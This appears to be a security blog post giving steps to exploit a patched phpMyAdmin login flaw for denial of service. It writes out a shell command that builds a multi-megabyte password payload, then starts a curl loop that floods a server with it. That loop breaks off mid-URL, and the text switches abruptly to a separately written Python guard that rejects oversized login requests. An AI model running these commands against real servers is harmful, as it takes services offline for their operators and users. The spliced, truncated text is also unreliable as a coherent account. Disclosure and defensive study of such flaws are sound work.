Assuming that enough time has passed since phpMyAdmin released the security update, we want to share our research. As you already know, we believe in Responsible Disclosure, and that is the reason why we didn't publish this post before.
You can read the vulnerability details in the previous blog post. In this one, we show you the way to exploit it.
1 - Create the payload.
$ echo -n "pma_username=xxxxxxxx&pma_password=" > payload && printf "%s" {1..1000000} >> payload
2 - Perform the Denial of Service attack.
$ for i in `seq 1 150`; do (curl --data @payload http://your-webserver-
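Seen from the server side, step 1 produces a login POST whose pma_password field is several megabytes long. The following is an added example, not code from the original post or from phpMyAdmin: a pre-authentication guard that refuses such a request on its declared size and then bounds each credential field. The function names and both caps are assumptions chosen for illustration.

```python
import io
from urllib.parse import parse_qsl

MAX_BODY_BYTES = 8 * 1024   # assumed cap for a login POST body
MAX_FIELD_CHARS = 256       # assumed cap for each credential field
LOGIN_FIELDS = ("pma_username", "pma_password")  # field names used in step 1


def check_login_request(content_length, stream):
    """Return (allowed, reason) for a login POST, reading as little as possible."""
    # Layer 1: refuse on the declared size, before touching the body.
    if content_length is None or content_length < 0:
        return False, "missing or invalid Content-Length"
    if content_length > MAX_BODY_BYTES:
        return False, f"body too large: {content_length} bytes"
    body = stream.read(content_length).decode("latin-1")
    # Layer 2: bound the number and the length of the form fields.
    try:
        fields = dict(parse_qsl(body, keep_blank_values=True, max_num_fields=8))
    except ValueError:
        return False, "too many form fields"
    for name in LOGIN_FIELDS:
        if len(fields.get(name, "")) > MAX_FIELD_CHARS:
            return False, f"{name} too long: {len(fields[name])} chars"
    return True, "ok"


def constructed_oversized_body():
    """Constructed sample with the same shape as the step 1 payload."""
    digits = "".join(str(i) for i in range(1, 1_000_001))
    return ("pma_username=xxxxxxxx&pma_password=" + digits).encode()


if __name__ == "__main__":
    big = constructed_oversized_body()
    print(len(big), check_login_request(len(big), io.BytesIO(big)))
    ok = b"pma_username=alice&pma_password=correct-horse"  # constructed
    print(check_login_request(len(ok), io.BytesIO(ok)))
```

The first layer never reads the body, so an oversized request costs the server one header comparison; the second layer catches a long field that still fits under the body cap.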